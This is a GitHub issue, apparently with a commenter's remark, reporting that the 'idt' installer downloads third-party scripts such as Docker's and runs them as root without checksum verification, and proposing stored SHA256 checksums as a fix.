rcj4747
commented
5 years ago get.docker.com specifically includes this message:
# NOTE: Make sure to verify the contents of the script
# you downloaded matches the contents of install.sh
# located at https://github.com/docker/docker-install
# before executing.
#
# Git commit from https://github.com/docker/docker-install when
# the script was uploaded (Should only be modified by upload job):
SCRIPT_COMMIT_SHA="6bf300318ebaab958c4adc341a8c7bb9f3a54a1a"That script also adds a 3rd party APT repository on Ubuntu/Debian systems without this installer making it explicit to the user that trust decisions are being made on behalf of the user for this and various other sources (like issue #138)
Summary
The idt install downloads files from 3rd party websites, but does not verify their contents before running them as root for installation. While traffic to these sites are secured with https, not verifying the content checksums means that breaches on the 3rd party site aren't detected.
It is considered best practice to checksum before running arbitrary code from the internet.
I suggest storing a set of SHA256 checksums in the script, and only installing the downloaded content if they match that.
Steps to reproduce (include tooling version, platform, etc)
Operating System Specify: (MacOS, Linux, Windows)
Supporting details (Logs, stack traces, images, etc. Wrap in
<detail> ... </detail>tags as appropriate)Development "done" checklist